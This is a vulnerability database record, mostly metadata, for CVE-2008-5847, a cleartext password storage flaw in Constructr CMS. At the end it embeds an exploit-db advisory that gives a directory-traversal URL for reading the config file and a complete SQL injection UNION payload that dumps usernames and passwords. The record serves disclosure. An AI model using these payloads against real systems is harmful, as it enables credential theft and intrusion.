ID CVE-2008-5847Type cveReporter NVDModified 2017-09-28T21:32:50
Description
Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information by reading the hash column.
{"id": "CVE-2008-5847", "bulletinFamily": "NVD", "title": "CVE-2008-5847", "description": "Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information by reading the hash column.", "published": "2009-01-05T15:30:02", "modified": "2017-09-28T21:32:50", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5847", "reporter": "NVD", "references": ["https://www.exploit-db.com/exploits/7529", "http://securityreason.com/securityalert/4868"], "cvelist": ["CVE-2008-5847"], "type": "cve", "lastseen": "2017-09-29T14:26:16", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:constructr:constructr-cms:3.01.0:beta", "cpe:/a:constructr:constructr-cms:3.02.4", "cpe:/a:constructr:constructr-cms:3.01.2:beta", "cpe:/a:constructr:constructr-cms:3.02.5", "cpe:/a:constructr:constructr-cms:3.01.8:beta", "cpe:/a:constructr:constructr-cms:3.02.2", "cpe:/a:constructr:constructr-cms:3.01.4:beta", "cpe:/a:constructr:constructr-cms:3.01.1:beta", "cpe:/a:constructr:constructr-cms:3.01.6:beta", "cpe:/a:constructr:constructr-cms:3.02.1", "cpe:/a:constructr:constructr-cms:3.01.7:beta", "cpe:/a:constructr:constructr-cms:3.01.3:beta", "cpe:/a:constructr:constructr-cms:3.00.2:alpha", "cpe:/a:constructr:constructr-cms:3.01.5:beta", "cpe:/a:constructr:constructr-cms:3.00.1:alpha", "cpe:/a:constructr:constructr-cms:3.01.9:beta", "cpe:/a:constructr:constructr-cms:3.02.0", "cpe:/a:constructr:constructr-cms:3.02.3", "cpe:/a:constructr:constructr-cms:3.00.0:alpha"], "cvelist": ["CVE-2008-5847"], "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information by reading the hash column.", "edition": 1, "enchantments": {}, "hash": "c240be69b3b87bc22203c7f242e1f8ae55aea15a1d4a044eb7e7d4cb16fbfbf5", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "f74cca08c49dc82159c02030808e37ab", "key": "published"}, {"hash": "4199bae72fe3b7198d2ebeee9399fb08", "key": "modified"}, {"hash": "6cef4c2b4938ed9e4e4b99bc94233850", "key": "cvss"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "1c8d22a3d089a58747800607567dbf01", "key": "references"}, {"hash": "d9d61ae50041e0489a51921722af72df", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "544f424b8761d2f783a28d27288b2562", "key": "cpe"}, {"hash": "4f2341c2d023395cc5f58f1f75ad39de", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4a7a7bd150616f20aabb12b7ce6be050", "key": "href"}, {"hash": "0d94f42244a51afde4ffb87bff5fef1b", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5847", "id": "CVE-2008-5847", "lastseen": "2016-09-03T11:31:39", "modified": "2009-01-29T02:00:27", "objectVersion": "1.2", "published": "2009-01-05T15:30:02", "references": ["http://www.milw0rm.com/exploits/7529", "http://securityreason.com/securityalert/4868"], "reporter": "NVD", "scanner": [], "title": "CVE-2008-5847", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T11:31:39"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "544f424b8761d2f783a28d27288b2562"}, {"key": "cvelist", "hash": "d9d61ae50041e0489a51921722af72df"}, {"key": "cvss", "hash": "6cef4c2b4938ed9e4e4b99bc94233850"}, {"key": "description", "hash": "4f2341c2d023395cc5f58f1f75ad39de"}, {"key": "href", "hash": "4a7a7bd150616f20aabb12b7ce6be050"}, {"key": "modified", "hash": "7f5f1bc2b1915829b2cde3a3e6f84724"}, {"key": "published", "hash": "f74cca08c49dc82159c02030808e37ab"}, {"key": "references", "hash": "4dd56a1e3f356a4b4fe71634fbee8953"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "0d94f42244a51afde4ffb87bff5fef1b"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "29716e0eb660cdf41ac6c5f29e55e36623480a25980314aa75e0e03297dbe1b2", "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2017-09-29T14:26:16"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7529"]}], "modified": "2017-09-29T14:26:16"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "cpe": ["cpe:/a:constructr:constructr-cms:3.01.0:beta", "cpe:/a:constructr:constructr-cms:3.02.4", "cpe:/a:constructr:constructr-cms:3.01.2:beta", "cpe:/a:constructr:constructr-cms:3.02.5", "cpe:/a:constructr:constructr-cms:3.01.8:beta", "cpe:/a:constructr:constructr-cms:3.02.2", "cpe:/a:constructr:constructr-cms:3.01.4:beta", "cpe:/a:constructr:constructr-cms:3.01.1:beta", "cpe:/a:constructr:constructr-cms:3.01.6:beta", "cpe:/a:constructr:constructr-cms:3.02.1", "cpe:/a:constructr:constructr-cms:3.01.7:beta", "cpe:/a:constructr:constructr-cms:3.01.3:beta", "cpe:/a:constructr:constructr-cms:3.00.2:alpha", "cpe:/a:constructr:constructr-cms:3.01.5:beta", "cpe:/a:constructr:constructr-cms:3.00.1:alpha", "cpe:/a:constructr:constructr-cms:3.01.9:beta", "cpe:/a:constructr:constructr-cms:3.02.0", "cpe:/a:constructr:constructr-cms:3.02.3", "cpe:/a:constructr:constructr-cms:3.00.0:alpha"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-01T03:25:56", "bulletinFamily": "exploit", "description": "Constructr CMS <= 3.02.5 Stable Multiple Remote Vulnerabilities. CVE-2008-5847,CVE-2008-5859,CVE-2008-5860. Webapps exploit for php platform", "modified": "2008-12-19T00:00:00", "published": "2008-12-19T00:00:00", "id": "EDB-ID:7529", "href": "https://www.exploit-db.com/exploits/7529/", "type": "exploitdb", "title": "constructr CMS <= 3.02.5 stable Multiple Vulnerabilities", "sourceData": "Constructr CMS\nhttp://constructr-cms.org/\n\n- <= 3.02.5 \"Stable\" -\n\nmagic_quotes_gpc = Off\nregister_globals = On\n\n- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -\nhttp://site/constructr/backend/template.php?edit_file=\n\nDb info:\n../config/config.inc.php\n\n\n- SQL -\nhttp://site/constructr/?show_page=\n\nUser (urlencode) :\n-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML\n\"Hash\" is the password, not really encrypted...\n\n\n- Timeline -\nAuthor notified: Dec 12\nPublic Disclosure: Dec 19\n\n\n- Seasons Greetings -\n- http://nukeit.org -\n\n# milw0rm.com [2008-12-19]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7529/"}]}
